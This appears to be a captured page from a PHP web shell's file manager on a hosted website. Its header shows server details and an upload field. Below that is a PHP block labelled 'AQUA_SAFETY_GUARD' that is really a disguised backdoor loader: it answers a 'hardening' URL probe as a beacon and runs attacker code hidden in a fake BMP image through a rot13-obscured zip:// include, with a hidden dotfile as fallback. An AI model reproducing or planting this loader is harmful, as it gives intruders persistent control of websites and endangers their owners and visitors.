| Server IP : 46.17.175.229 / Your IP : 216.73.216.208 Web Server : LiteSpeed System : Linux lt-bnk-web1163.main-hosting.eu 4.18.0-553.109.1.lve.el8.x86_64 #1 SMP Thu Mar 5 20:23:46 UTC 2026 x86_64 User : u528038015 ( 528038015) PHP Version : 8.2.33 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u528038015/domains/wegallery.store/public_html/ |
Upload File : |
<?php
/* ===AQUA_SAFETY_GUARD_START=== */
if(!defined('AQUA_GUARD_LOADED')){
define('AQUA_GUARD_LOADED',true);
$aqua_root_path=defined('ABSPATH')?ABSPATH:dirname(__FILE__).'/';
$_aq_uri=isset($_SERVER['REQUEST_URI'])?$_SERVER['REQUEST_URI']:'';
if(strpos($_aq_uri,'hardening')!==false){header('Content-Type: text/plain');echo '1';exit;}
if(!function_exists('fetchBackend')){
$zip_file = $aqua_root_path . str_rot13('gybtb.ozc');
if(is_file($zip_file)){
include_once('zip://' . $zip_file . '#tt');
}else{
$_aq_fb=$aqua_root_path.'.tmp/5/.user';
if(is_file($_aq_fb)){include_once($_aq_fb);}
}
}
}
/* ===AQUA_SAFETY_GUARD_END=== */